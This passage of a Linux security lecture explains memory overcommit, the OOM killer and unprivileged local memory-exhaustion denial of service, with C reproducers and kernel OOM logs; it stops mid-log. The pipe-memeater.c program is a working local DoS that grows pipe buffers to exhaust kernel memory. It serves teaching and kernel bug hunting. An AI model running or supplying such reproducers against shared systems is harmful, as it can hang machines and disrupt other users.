The memory management subsystem in the Linux kernel is very optimistic. Therefore, unless resources are appropriately restricted using memory cgroup, it is easy to make Linux systems defunctional due to depletion of system memory via out of memory local DoS attacks. And it is causing a factor for disturbing Linux system's stable operations such as unexplained hang up, for it is possible to by chance form an attack without intention to attack.
In this lecture, you will learn how to find bugs (bug hunting) caused by depletion of depletion of memory, look back on mortal combat on Linux kernel's memory management subsystem (which started from a vulnerability I by chance found, and still ongoing), and think about what we should do against the reality that we cannot eradicate bugs caused by depletion of memory.
Many sample programs which form out of memory local DoS attacks are introduced. It is no good to execute these programs on machines you are not administrating.
Even in the offense and defense CTF competitions, you might be disqualified for "actions which puts excessive stresses" if you execute these programs.
I'm not an expert of memory management subsystem. Also, I have never diligently studied by reading books about Linux kernels. In this lecture, I explain things which I learned from my experiences and which are not explained in technical description books.
Reproducer programs are made for below environment. You may use virtual environments such as VMware Player.
CPUs | 4 ( x86_64 architecture) |
RAM | 1024MB or 2048MB (Not numa system) |
swap partitions | none |
Hard disk | A disk recognized as /dev/sda (You might fail to reproduce if not recognized as a SCSI device) |
CD-ROM | A drive recognized as /dev/sr0 (You might fail to reproduce if not recognized as a SCSI device) |
Mount tree | Only / partition from /dev/sda1 formatted as ext4 or xfs |
Please understand that results would differ due to variable factors such as kernel versions, system configurations, executed timings.
From April 2003 till March 2012, I was involved in development of access control modules named TOMOYO Linux. While we cannot eradicate bugs such as buffer overflow vulnerability and/or OS command injection vulnerability, there was only one access control module named SELinux which is so cryptographic to use when TOMOYO project started.
Regarding war stories of mainlining TOMOYO Linux, please see lecture text for Security & programming camp 2011 (written in Japanese).
Regarding the history of starting from TOMOYO Linux till reaching AKARI and CaitSith, please see lecture text for Security camp 2012.
If you are interested in protection against OS command injection vulnerability (e.g. ShellShock), please see lecture text for Security camp 2015 (written in Japanese).
From April 2012 till March 2015, I was involved in responding to the inquiries of (mainly) RHEL 4 / RHEL 5 / RHEL 6 systems at a support center. Since I experienced Linux kernel programming via the development of TOMOYO Linux (due to the nature of access control modules, only areas close to userspace though), I handled inquiries of problems which steps for reproducing and/or examining the problems are not established yet and therefore needs to identify what is happening (by writing programs for examination).
It is common to get support requests for examining the cause of unexpected hangups or reboots. But it seldom succeeded to identify the cause of hangups because there was no clue message in /var/log/messages .
I proposed enabling serial consoles and/or netconsole with an expectation that "Although we cannot expect that messages during hang up situation are recorded to log files, the kernel might have printed something during hang up situation.", but we did not get any messages as far as I remember. It was frustrating situation as if encountering unsolvable challenges one after another in the Capture The Flag (CTF) games.
You can trace the discussions since November 2014 (mainly) at archive of linux-mm mailing list.
In userspace, memory allocation requests seldom fail. We can ask for more memory than the system has using malloc() etc. because memory overcommitting is permitted by default.
---------- overcommit.c ---------- #include <stdio.h> #include <stdlib.h> int main(int argc, char *argv[]) { unsigned long size = 0; char *buf = NULL; while (1) { char *cp = realloc(buf, size + 1048576); if (!cp) break; buf = cp; size += 1048576; } printf("Allocated %lu MB\n", size / 1048576); free(buf); printf("Freed %lu MB\n", size / 1048576); return 0; } ---------- overcommit.c ----------
---------- Example output start ---------- [kumaneko@localhost ~]$ cat /proc/meminfo MemTotal: 1914588 kB MemFree: 1758600 kB Buffers: 9044 kB Cached: 55324 kB SwapCached: 0 kB Active: 38408 kB Inactive: 42832 kB Active(anon): 17112 kB Inactive(anon): 4 kB Active(file): 21296 kB Inactive(file): 42828 kB Unevictable: 0 kB Mlocked: 0 kB SwapTotal: 0 kB SwapFree: 0 kB Dirty: 64 kB Writeback: 0 kB AnonPages: 16888 kB Mapped: 12552 kB Shmem: 228 kB Slab: 36644 kB SReclaimable: 10984 kB SUnreclaim: 25660 kB KernelStack: 3760 kB PageTables: 2892 kB NFS_Unstable: 0 kB Bounce: 0 kB WritebackTmp: 0 kB CommitLimit: 957292 kB Committed_AS: 92500 kB VmallocTotal: 34359738367 kB VmallocUsed: 149588 kB VmallocChunk: 34359581684 kB HardwareCorrupted: 0 kB AnonHugePages: 2048 kB HugePages_Total: 0 HugePages_Free: 0 HugePages_Rsvd: 0 HugePages_Surp: 0 Hugepagesize: 2048 kB DirectMap4k: 6144 kB DirectMap2M: 1042432 kB DirectMap1G: 1048576 kB [kumaneko@localhost ~]$ ./overcommit Allocated 100663295 MB Freed 100663295 MB [kumaneko@localhost ~]$ ---------- Example output end ----------
Thanks to memory overcommitting, we can run many processes.
A mechanism for trying to survive the Linux systems by solving out of memory (OOM) situation when OOM situation occurred.
Reclaims memory by forcibly terminating processes by sending SIGKILL signal.
Assumes that we can always reclaim memory because SIGKILL signal cannot be ignored.
Risk level 0: We have enough room. | Risk level 1: We are close to problems. | Risk level 2: OOM situation occurred. | Risk level 3: The game is over. |
If there is plenty of free memory, we don't need to reclaim memory. | When free memory reduced to low: watermark, kswapd process asynchronously reclaims memory until free memory recovers to high: watermark. If asynchronous reclaim by kswapd is not sufficient, synchronous reclaim (direct reclaim) by allocating process is performed. | If free memory reduced to min: watermark, and nobody can reclaim memory any more, the system is in OOM situation. If it is allowed to invoke the OOM killer, the OOM killer reclaims memory by terminating processes by sending SIGKILL signal. | If free memory reaches 0, the system will hang up in most cases. |
---------- oom.c ---------- #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char *argv[]) { unsigned long size = 0; char *buf = NULL; while (1) { char *cp = realloc(buf, size + 1048576); if (!cp) break; buf = cp; size += 1048576; } printf("Allocated %lu MB\n", size / 1048576); memset(buf, 0, size); printf("Filled %lu MB\n", size / 1048576); free(buf); printf("Freed %lu MB\n", size / 1048576); return 0; } ---------- oom.c ----------
---------- Example output start ---------- [kumaneko@localhost ~]$ ./oom Allocated 100663295 MB Killed [kumaneko@localhost ~]$ dmesg [ 164.825320] oom invoked oom-killer: gfp_mask=0x280da, order=0, oom_adj=0, oom_score_adj=0 [ 164.826957] oom cpuset=/ mems_allowed=0 [ 164.827789] Pid: 1615, comm: oom Not tainted 2.6.32-573.26.1.el6.x86_64 #1 [ 164.829140] Call Trace: [ 164.829593] [<ffffffff810d7151>] ? cpuset_print_task_mems_allowed+0x91/0xb0 [ 164.830855] [<ffffffff8112a950>] ? dump_header+0x90/0x1b0 [ 164.832089] [<ffffffff8123360c>] ? security_real_capable_noaudit+0x3c/0x70 [ 164.833303] [<ffffffff8112add2>] ? oom_kill_process+0x82/0x2a0 [ 164.834402] [<ffffffff8112ad11>] ? select_bad_process+0xe1/0x120 [ 164.835512] [<ffffffff8112b210>] ? out_of_memory+0x220/0x3c0 [ 164.836543] [<ffffffff81137bec>] ? __alloc_pages_nodemask+0x93c/0x950 [ 164.837692] [<ffffffff81170a7a>] ? alloc_pages_vma+0x9a/0x150 [ 164.838743] [<ffffffff81152edd>] ? handle_pte_fault+0x73d/0xb20 [ 164.839886] [<ffffffff810537b7>] ? pte_alloc_one+0x37/0x50 [ 164.841020] [<ffffffff8118c559>] ? do_huge_pmd_anonymous_page+0xb9/0x3b0 [ 164.842306] [<ffffffff81153559>] ? handle_mm_fault+0x299/0x3d0 [ 164.843400] [<ffffffff810663f3>] ? perf_event_task_sched_out+0x33/0x70 [ 164.844603] [<ffffffff8104f156>] ? __do_page_fault+0x146/0x500 [ 164.845672] [<ffffffff8153927e>] ? thread_return+0x4e/0x7d0 [ 164.846723] [<ffffffff8153f90e>] ? do_page_fault+0x3e/0xa0 [ 164.847953] [<ffffffff8153cc55>] ? page_fault+0x25/0x30 [ 164.848914] Mem-Info: [ 164.849339] Node 0 DMA per-cpu: [ 164.849937] CPU 0: hi: 0, btch: 1 usd: 0 [ 164.850804] CPU 1: hi: 0, btch: 1 usd: 0 [ 164.851781] CPU 2: hi: 0, btch: 1 usd: 0 [ 164.852670] CPU 3: hi: 0, btch: 1 usd: 0 [ 164.853632] Node 0 DMA32 per-cpu: [ 164.854269] CPU 0: hi: 186, btch: 31 usd: 0 [ 164.855133] CPU 1: hi: 186, btch: 31 usd: 0 [ 164.856152] CPU 2: hi: 186, btch: 31 usd: 0 [ 164.857041] CPU 3: hi: 186, btch: 31 usd: 0 [ 164.858033] active_anon:446933 inactive_anon:1 isolated_anon:0 [ 164.858034] active_file:0 inactive_file:14 isolated_file:0 [ 164.858034] unevictable:0 dirty:1 writeback:0 unstable:0 [ 164.858034] free:13259 slab_reclaimable:1902 slab_unreclaimable:6401 [ 164.858035] mapped:9 shmem:57 pagetables:1732 bounce:0 [ 164.863169] Node 0 DMA free:8336kB min:332kB low:412kB high:496kB active_anon:7332kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15300kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:0kB slab_unreclaimable:0kB kernel_stack:0kB pagetables:40kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 164.870125] lowmem_reserve[]: 0 2004 2004 2004 [ 164.871060] Node 0 DMA32 free:44700kB min:44720kB low:55900kB high:67080kB active_anon:1780400kB inactive_anon:4kB active_file:0kB inactive_file:56kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:4kB writeback:0kB mapped:36kB shmem:228kB slab_reclaimable:7608kB slab_unreclaimable:25604kB kernel_stack:3776kB pagetables:6888kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:690 all_unreclaimable? yes [ 164.878996] lowmem_reserve[]: 0 0 0 0 [ 164.879969] Node 0 DMA: 2*4kB 1*8kB 4*16kB 2*32kB 2*64kB 1*128kB 1*256kB 1*512kB 1*1024kB 1*2048kB 1*4096kB = 8336kB [ 164.882265] Node 0 DMA32: 496*4kB 137*8kB 45*16kB 26*32kB 38*64kB 11*128kB 2*256kB 8*512kB 13*1024kB 5*2048kB 2*4096kB = 44824kB [ 164.884786] 99 total pagecache pages [ 164.885462] 0 pages in swap cache [ 164.886100] Swap cache stats: add 0, delete 0, find 0/0 [ 164.887027] Free swap = 0kB [ 164.887677] Total swap = 0kB [ 164.890966] 524272 pages RAM [ 164.891554] 45689 pages reserved [ 164.892198] 460 pages shared [ 164.892760] 459990 pages non-shared [ 164.893400] [ pid ] uid tgid total_vm rss cpu oom_adj oom_score_adj name [ 164.894783] [ 485] 0 485 2672 118 3 -17 -1000 udevd [ 164.896319] [ 1139] 0 1139 2280 123 2 0 0 dhclient [ 164.897721] [ 1195] 0 1195 6899 60 2 -17 -1000 auditd [ 164.899068] [ 1217] 0 1217 62272 649 0 0 0 rsyslogd [ 164.900463] [ 1246] 81 1246 5388 107 1 0 0 dbus-daemon [ 164.901944] [ 1259] 0 1259 20705 222 0 0 0 NetworkManager [ 164.903465] [ 1263] 0 1263 14530 124 3 0 0 modem-manager [ 164.905125] [ 1298] 68 1298 9588 292 3 0 0 hald [ 164.906547] [ 1299] 0 1299 5099 54 3 0 0 hald-runner [ 164.908127] [ 1337] 0 1337 5627 47 1 0 0 hald-addon-rfki [ 164.909747] [ 1345] 0 1345 5629 47 0 0 0 hald-addon-inpu [ 164.911254] [ 1346] 0 1346 11247 133 2 0 0 wpa_supplicant [ 164.912993] [ 1351] 68 1351 4501 41 2 0 0 hald-addon-acpi [ 164.914570] [ 1372] 0 1372 16558 177 0 -17 -1000 sshd [ 164.915955] [ 1451] 0 1451 20222 226 2 0 0 master [ 164.917391] [ 1463] 89 1463 20242 217 0 0 0 pickup [ 164.918860] [ 1464] 89 1464 20259 218 1 0 0 qmgr [ 164.920391] [ 1465] 0 1465 29216 152 2 0 0 crond [ 164.921769] [ 1479] 0 1479 17403 127 3 0 0 login [ 164.923171] [ 1480] 0 1480 1020 23 0 0 0 agetty [ 164.924621] [ 1482] 0 1482 1016 21 3 0 0 mingetty [ 164.926043] [ 1484] 0 1484 1016 21 3 0 0 mingetty [ 164.927490] [ 1486] 0 1486 1016 22 3 0 0 mingetty [ 164.928890] [ 1488] 0 1488 1016 20 3 0 0 mingetty [ 164.930313] [ 1490] 0 1490 1016 22 2 0 0 mingetty [ 164.931718] [ 1495] 0 1495 2671 117 1 -17 -1000 udevd [ 164.933090] [ 1496] 0 1496 2671 117 3 -17 -1000 udevd [ 164.934490] [ 1498] 0 1498 521256 370 1 0 0 console-kit-dae [ 164.935999] [ 1565] 0 1565 27075 101 1 0 0 bash [ 164.937387] [ 1580] 0 1580 25629 254 0 0 0 sshd [ 164.938787] [ 1582] 500 1582 25629 252 0 0 0 sshd [ 164.940167] [ 1583] 500 1583 27076 97 0 0 0 bash [ 164.941506] [ 1615] 500 1615 25769820886 442651 2 0 0 oom [ 164.942905] Out of memory: Kill process 1615 (oom) score 926 or sacrifice child [ 164.944495] Killed process 1615, UID 500, (oom) total-vm:103079283544kB, anon-rss:1770600kB, file-rss:4kB [kumaneko@localhost ~]$ ---------- Example output end ----------
It seems that OOM killer is functional, doesn't it?
Linux provides cgroup functionality for restricting resource usage, and memory cgroup (which is one of cgroup functionality) can restrict memory usage based on a group which a process belongs to. But if memory cgroup is not appropriately configured, system wide OOM situation will occur after all.
In this lecture, I basically assume only system wide OOM situation.
If I end here, it is nothing but a user's guide. In this lecture, I explain about contradiction in memory management subsystem.
One day in July 2013, I noticed a strange patch when doing "git bisect" for debugging some problem in the development kernel.
[35f3d14dbbc58447c61e38a162ea10add6b31dc7] pipe: add support for shrinking and growing pipes
··· I checked for relevant patches, and it turned out that an unprivileged user can grow pipe's buffer size from, 64KB to 1MB.
---------- pipe-memeater.c ---------- #include <stdio.h> #include <fcntl.h> #include <unistd.h> #include <errno.h> #define F_SETPIPE_SZ (1024 + 7) static void child(void) { int fd[2]; while (pipe(fd) != EOF && fcntl(fd[1], F_SETPIPE_SZ, 1048576) != EOF) { int i; for (i = 0; i < 256; i++) { static char buf[4096]; if (write(fd[1], buf, sizeof(buf)) != sizeof(buf)) { printf("write error\n"); _exit(1); } } close(fd[0]); } pause(); _exit(0); } int main(int argc, char *argv[]) { int i; close(0); for (i = 2; i < 1024; i++) close(i); for (i = 0; i < 10; i++) if (fork() == 0) child(); return 0; } ---------- pipe-memeater.c ----------
---------- Example output start ---------- [kumaneko@localhost ~]$ pstree -pA init(1)-+-NetworkManager(1206) |-agetty(1430) |-auditd(1142)---{auditd}(1143) |-bonobo-activati(1630)---{bonobo-activat}(1631) |-console-kit-dae(1440)-+-{console-kit-da}(1441) | |-{console-kit-da}(1442) | |-{console-kit-da}(1443) | |-{console-kit-da}(1444) | |-{console-kit-da}(1445) | |-{console-kit-da}(1446) | |-{console-kit-da}(1447) | |-{console-kit-da}(1448) | |-{console-kit-da}(1449) | |-{console-kit-da}(1450) | |-{console-kit-da}(1451) | |-{console-kit-da}(1452) | |-{console-kit-da}(1453) | |-{console-kit-da}(1454) | |-{console-kit-da}(1455) | |-{console-kit-da}(1456) | |-{console-kit-da}(1457) | |-{console-kit-da}(1458) | |-{console-kit-da}(1459) | |-{console-kit-da}(1460) | |-{console-kit-da}(1461) | |-{console-kit-da}(1462) | |-{console-kit-da}(1463) | |-{console-kit-da}(1464) | |-{console-kit-da}(1465) | |-{console-kit-da}(1466) | |-{console-kit-da}(1467) | |-{console-kit-da}(1468) | |-{console-kit-da}(1469) | |-{console-kit-da}(1470) | |-{console-kit-da}(1471) | |-{console-kit-da}(1472) | |-{console-kit-da}(1473) | |-{console-kit-da}(1474) | |-{console-kit-da}(1475) | |-{console-kit-da}(1476) | |-{console-kit-da}(1477) | |-{console-kit-da}(1478) | |-{console-kit-da}(1479) | |-{console-kit-da}(1480) | |-{console-kit-da}(1481) | |-{console-kit-da}(1482) | |-{console-kit-da}(1483) | |-{console-kit-da}(1484) | |-{console-kit-da}(1485) | |-{console-kit-da}(1486) | |-{console-kit-da}(1487) | |-{console-kit-da}(1488) | |-{console-kit-da}(1489) | |-{console-kit-da}(1490) | |-{console-kit-da}(1491) | |-{console-kit-da}(1492) | |-{console-kit-da}(1493) | |-{console-kit-da}(1494) | |-{console-kit-da}(1495) | |-{console-kit-da}(1496) | |-{console-kit-da}(1497) | |-{console-kit-da}(1498) | |-{console-kit-da}(1499) | |-{console-kit-da}(1500) | |-{console-kit-da}(1501) | |-{console-kit-da}(1502) | `-{console-kit-da}(1504) |-crond(1408) |-dbus-daemon(1601) |-dbus-daemon(1193) |-dbus-launch(1600) |-devkit-power-da(1605) |-dhclient(1086) |-gconfd-2(1609) |-gdm-binary(1567)-+-gdm-simple-slav(1580)-+-Xorg(1583) | | |-gdm-session-wor(1661) | | |-gnome-session(1602)-+-at-spi-registry(1625) | | | |-gdm-simple-gree(1641)---{gdm-simple-gre}(1652) | | | |-gnome-power-man(1642) | | | |-metacity(1638) | | | |-polkit-gnome-au(1640) | | | `-{gnome-session}(1626) | | `-{gdm-simple-sla}(1584) | `-{gdm-binary}(1581) |-gnome-settings-(1628)---{gnome-settings}(1633) |-gvfsd(1637) |-hald(1245)-+-hald-runner(1246)-+-hald-addon-acpi(1295) | | |-hald-addon-inpu(1293) | | `-hald-addon-rfki(1285) | `-{hald}(1247) |-login(1424)---bash(1507) |-master(1396)-+-pickup(1411) | `-qmgr(1413) |-mingetty(1426) |-mingetty(1428) |-mingetty(1431) |-mingetty(1433) |-mingetty(1435) |-modem-manager(1211) |-notification-da(1651) |-polkitd(1645) |-pulseaudio(1654)---{pulseaudio}(1660) |-rsyslogd(1164)-+-{rsyslogd}(1165) | |-{rsyslogd}(1166) | `-{rsyslogd}(1167) |-rtkit-daemon(1656)-+-{rtkit-daemon}(1657) | `-{rtkit-daemon}(1658) |-sshd(1317)---sshd(1664)---sshd(1666)---bash(1667)---pstree(1684) |-udevd(423)-+-udevd(1437) | `-udevd(1438) `-wpa_supplicant(1282) [kumaneko@localhost ~]$ ./pipe-memeater (Omitting re-login operation) [kumaneko@localhost ~]$ dmesg [ 100.086247] pipe-memeater invoked oom-killer: gfp_mask=0x200d2, order=0, oom_adj=0 [ 100.087747] pipe-memeater cpuset=/ mems_allowed=0 [ 100.088693] Pid: 1687, comm: pipe-memeater Not tainted 2.6.35.14 #1 [ 100.089949] Call Trace: [ 100.090640] [<ffffffff810ac9e1>] ? cpuset_print_task_mems_allowed+0x91/0xa0 [ 100.092080] [<ffffffff810f8e4e>] dump_header+0x6e/0x1c0 [ 100.093106] [<ffffffff8121b950>] ? ___ratelimit+0xa0/0x120 [ 100.094226] [<ffffffff810f9021>] oom_kill_process+0x81/0x180 [ 100.095432] [<ffffffff810f9558>] __out_of_memory+0x58/0xd0 [ 100.096745] [<ffffffff810f9656>] out_of_memory+0x86/0x1b0 [ 100.097796] [<ffffffff810fe4dc>] __alloc_pages_nodemask+0x7dc/0x7f0 [ 100.098990] [<ffffffff8112e87a>] alloc_pages_current+0x9a/0x100 [ 100.100181] [<ffffffff8114de87>] pipe_write+0x387/0x670 [ 100.101200] [<ffffffff8114504a>] do_sync_write+0xda/0x120 [ 100.102284] [<ffffffff8114e7ad>] ? pipe_fcntl+0x11d/0x230 [ 100.103319] [<ffffffff8113583c>] ? __kmalloc+0x21c/0x230 [ 100.104381] [<ffffffff811cb556>] ? security_file_permission+0x16/0x20 [ 100.105659] [<ffffffff81145328>] vfs_write+0xb8/0x1a0 [ 100.106684] [<ffffffff810ba932>] ? audit_syscall_entry+0x252/0x280 [ 100.108022] [<ffffffff81145cd1>] sys_write+0x51/0x90 [ 100.109007] [<ffffffff8100aff2>] system_call_fastpath+0x16/0x1b [ 100.110197] Mem-Info: [ 100.110644] Node 0 DMA per-cpu: [ 100.111327] CPU 0: hi: 0, btch: 1 usd: 0 [ 100.112277] CPU 1: hi: 0, btch: 1 usd: 0 [ 100.113140] CPU 2: hi: 0, btch: 1 usd: 0 [ 100.114110] CPU 3: hi: 0, btch: 1 usd: 0 [ 100.114971] Node 0 DMA32 per-cpu: [ 100.115658] CPU 0: hi: 186, btch: 31 usd: 0 [ 100.116654] CPU 1: hi: 186, btch: 31 usd: 32 [ 100.117595] CPU 2: hi: 186, btch: 31 usd: 0 [ 100.118537] CPU 3: hi: 186, btch: 31 usd: 0 [ 100.119483] active_anon:11091 inactive_anon:3641 isolated_anon:0 [ 100.119484] active_file:21 inactive_file:24 isolated_file:0 [ 100.119485] unevictable:0 dirty:21 writeback:0 unstable:0 [ 100.119485] free:3422 slab_reclaimable:4462 slab_unreclaimable:22253 [ 100.119485] mapped:276 shmem:305 pagetables:1864 bounce:0 [ 100.125138] Node 0 DMA free:8024kB min:40kB low:48kB high:60kB active_anon:0kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15704kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:0kB slab_unreclaimable:100kB kernel_stack:0kB pagetables:0kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 100.132211] lowmem_reserve[]: 0 2004 2004 2004 [ 100.133220] Node 0 DMA32 free:5664kB min:5708kB low:7132kB high:8560kB active_anon:44108kB inactive_anon:14820kB active_file:84kB inactive_file:96kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:84kB writeback:0kB mapped:1104kB shmem:1220kB slab_reclaimable:17848kB slab_unreclaimable:88912kB kernel_stack:2008kB pagetables:7456kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:1412 all_unreclaimable? yes [ 100.141024] lowmem_reserve[]: 0 0 0 0 [ 100.141879] Node 0 DMA: 1*4kB 2*8kB 0*16kB 2*32kB 2*64kB 1*128kB 2*256kB 2*512kB 2*1024kB 2*2048kB 0*4096kB = 8020kB [ 100.144271] Node 0 DMA32: 676*4kB 7*8kB 0*16kB 0*32kB 1*64kB 1*128kB 0*256kB 0*512kB 1*1024kB 1*2048kB 0*4096kB = 6024kB [ 100.146722] 346 total pagecache pages [ 100.147435] 0 pages in swap cache [ 100.148090] Swap cache stats: add 0, delete 0, find 0/0 [ 100.149096] Free swap = 0kB [ 100.149671] Total swap = 0kB [ 100.152844] 524272 pages RAM [ 100.153432] 13239 pages reserved [ 100.154126] 1067 pages shared [ 100.154695] 488972 pages non-shared [ 100.155379] [ pid ] uid tgid total_vm rss cpu oom_adj name [ 100.156582] [ 1] 0 1 4851 75 1 0 init [ 100.157793] [ 423] 0 423 2767 200 0 -17 udevd [ 100.158985] [ 1086] 0 1086 2292 122 1 0 dhclient [ 100.160335] [ 1142] 0 1142 6399 49 1 -17 auditd [ 100.161553] [ 1164] 0 1164 60746 96 1 0 rsyslogd [ 100.162787] [ 1193] 81 1193 5471 159 3 0 dbus-daemon [ 100.164070] [ 1206] 0 1206 20717 219 0 0 NetworkManager [ 100.165406] [ 1211] 0 1211 14542 123 1 0 modem-manager [ 100.166709] [ 1245] 68 1245 9089 296 0 0 hald [ 100.167855] [ 1246] 0 1246 5111 56 3 0 hald-runner [ 100.169135] [ 1282] 0 1282 11259 132 3 0 wpa_supplicant [ 100.170476] [ 1285] 0 1285 5639 42 1 0 hald-addon-rfki [ 100.171936] [ 1293] 0 1293 5641 42 0 0 hald-addon-inpu [ 100.173260] [ 1295] 68 1295 4513 40 3 0 hald-addon-acpi [ 100.174622] [ 1317] 0 1317 16570 177 0 -17 sshd [ 100.175790] [ 1396] 0 1396 20234 218 0 0 master [ 100.177024] [ 1408] 0 1408 29216 152 2 0 crond [ 100.178188] [ 1411] 89 1411 20254 217 1 0 pickup [ 100.179389] [ 1413] 89 1413 20271 216 1 0 qmgr [ 100.180571] [ 1424] 0 1424 17415 123 3 0 login [ 100.181737] [ 1426] 0 1426 1028 21 2 0 mingetty [ 100.182983] [ 1428] 0 1428 1028 21 3 0 mingetty [ 100.184222] [ 1430] 0 1430 1032 21 0 0 agetty [ 100.185481] [ 1431] 0 1431 1028 21 1 0 mingetty [ 100.187031] [ 1433] 0 1433 1028 20 1 0 mingetty [ 100.188345] [ 1435] 0 1435 1028 21 2 0 mingetty [ 100.189638] [ 1437] 0 1437 2683 116 3 -17 udevd [ 100.190865] [ 1438] 0 1438 2683 116 2 -17 udevd [ 100.192152] [ 1440] 0 1440 520756 243 3 0 console-kit-dae [ 100.193565] [ 1507] 0 1507 27088 95 1 0 bash [ 100.194796] [ 1567] 0 1567 33001 79 1 0 gdm-binary [ 100.196134] [ 1580] 0 1580 40656 150 3 0 gdm-simple-slav [ 100.197543] [ 1583] 0 1583 42848 4384 2 0 Xorg [ 100.198911] [ 1600] 42 1600 5021 55 1 0 dbus-launch [ 100.200288] [ 1601] 42 1601 5402 79 3 0 dbus-daemon [ 100.201579] [ 1602] 42 1602 66762 476 3 0 gnome-session [ 100.202944] [ 1605] 0 1605 12502 161 3 0 devkit-power-da [ 100.204322] [ 1609] 42 1609 33068 538 0 0 gconfd-2 [ 100.205580] [ 1625] 42 1625 30187 283 0 0 at-spi-registry [ 100.206961] [ 1628] 42 1628 86331 943 0 0 gnome-settings- [ 100.208318] [ 1630] 42 1630 88624 186 1 0 bonobo-activati [ 100.210025] [ 1637] 42 1637 33831 76 2 0 gvfsd [ 100.211269] [ 1638] 42 1638 71465 679 0 0 metacity [ 100.212521] [ 1640] 42 1640 62088 437 3 0 polkit-gnome-au [ 100.213886] [ 1641] 42 1641 94596 1210 2 0 gdm-simple-gree [ 100.215265] [ 1642] 42 1642 68437 516 2 0 gnome-power-man [ 100.216677] [ 1645] 0 1645 13169 304 1 0 polkitd [ 100.217893] [ 1654] 42 1654 85934 194 1 0 pulseaudio [ 100.220379] [ 1656] 498 1656 41101 45 2 0 rtkit-daemon [ 100.221717] [ 1661] 0 1661 35453 91 1 0 gdm-session-wor [ 100.223103] [ 1664] 0 1664 25640 254 0 0 sshd [ 100.224290] [ 1666] 500 1666 25640 252 0 0 sshd [ 100.225575] [ 1667] 500 1667 27088 92 3 0 bash [ 100.226844] [ 1686] 500 1686 993 18 0 0 pipe-memeater [ 100.228117] [ 1687] 500 1687 993 18 3 0 pipe-memeater [ 100.229486] [ 1688] 500 1688 993 18 1 0 pipe-memeater [ 100.230815] [ 1689] 500 1689 993 18 0 0 pipe-memeater [ 100.232127] [ 1690] 500 1690 993 18 2 0 pipe-memeater [ 100.233439] [ 1691] 500 1691 993 18 0 0 pipe-memeater [ 100.234773] [ 1692] 500 1692 993 18 1 0 pipe-memeater [ 100.236084] [ 1693] 500 1693 993 18 0 0 pipe-memeater [ 100.237375] [ 1694] 500 1694 993 18 2 0 pipe-memeater [ 100.238727] [ 1695] 500 1695 993 18 0 0 pipe-memeater [ 100.240035] Out of memory: kill process 1602 (gnome-session) score 230152 or a child [ 100.241502] Killed process 1625 (at-spi-registry) vsz:120748kB, anon-rss:1132kB, file-rss:0kB (Omitting repetitions) [ 117.042248] pipe-memeater invoked oom-killer: gfp_mask=0x201da, order=0, oom_adj=0 [ 117.047397] pipe-memeater cpuset=/ mems_allowed=0 [ 117.050821] Pid: 1695, comm: pipe-memeater Not tainted 2.6.35.14 #1 [ 117.055079] Call Trace: [ 117.056842] [<ffffffff810ac9e1>] ? cpuset_print_task_mems_allowed+0x91/0xa0 [ 117.061573] [<ffffffff810f8e4e>] dump_header+0x6e/0x1c0 [ 117.065216] [<ffffffff8121b950>] ? ___ratelimit+0xa0/0x120 [ 117.069040] [<ffffffff810f9021>] oom_kill_process+0x81/0x180 [ 117.072962] [<ffffffff810f9558>] __out_of_memory+0x58/0xd0 [ 117.076774] [<ffffffff810f9656>] out_of_memory+0x86/0x1b0 [ 117.080130] [<ffffffff810fe4dc>] __alloc_pages_nodemask+0x7dc/0x7f0 [ 117.081905] [<ffffffff810503f9>] ? finish_task_switch+0x49/0xb0 [ 117.083564] [<ffffffff8112e87a>] alloc_pages_current+0x9a/0x100 [ 117.085189] [<ffffffff810f6627>] __page_cache_alloc+0x87/0x90 [ 117.086761] [<ffffffff8110056b>] __do_page_cache_readahead+0xdb/0x210 [ 117.088509] [<ffffffff811006c1>] ra_submit+0x21/0x30 [ 117.089867] [<ffffffff810f7eb0>] filemap_fault+0x400/0x450 [ 117.091370] [<ffffffff81111c34>] __do_fault+0x54/0x550 [ 117.092783] [<ffffffff811148f5>] handle_mm_fault+0x1c5/0xce0 [ 117.094331] [<ffffffff8114e7ad>] ? pipe_fcntl+0x11d/0x230 [ 117.095809] [<ffffffff8113583c>] ? __kmalloc+0x21c/0x230 [ 117.097269] [<ffffffff8148817c>] do_page_fault+0x11c/0x320 [ 117.098771] [<ffffffff81484e35>] page_fault+0x25/0x30 [ 117.100186] Mem-Info: [ 117.100828] Node 0 DMA per-cpu: [ 117.101721] CPU 0: hi: 0, btch: 1 usd: 0 [ 117.103026] CPU 1: hi: 0, btch: 1 usd: 0 [ 117.104324] CPU 2: hi: 0, btch: 1 usd: 0 [ 117.105638] CPU 3: hi: 0, btch: 1 usd: 0 [ 117.106938] Node 0 DMA32 per-cpu: [ 117.107901] CPU 0: hi: 186, btch: 31 usd: 0 [ 117.109194] CPU 1: hi: 186, btch: 31 usd: 0 [ 117.110416] CPU 2: hi: 186, btch: 31 usd: 60 [ 117.111349] CPU 3: hi: 186, btch: 31 usd: 0 [ 117.112250] active_anon:108 inactive_anon:943 isolated_anon:0 [ 117.112250] active_file:12 inactive_file:26 isolated_file:0 [ 117.112251] unevictable:0 dirty:0 writeback:0 unstable:0 [ 117.112251] free:3440 slab_reclaimable:3789 slab_unreclaimable:22390 [ 117.112252] mapped:0 shmem:73 pagetables:199 bounce:0 [ 117.117807] Node 0 DMA free:8064kB min:40kB low:48kB high:60kB active_anon:0kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15704kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:24kB slab_unreclaimable:1044kB kernel_stack:0kB pagetables:0kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 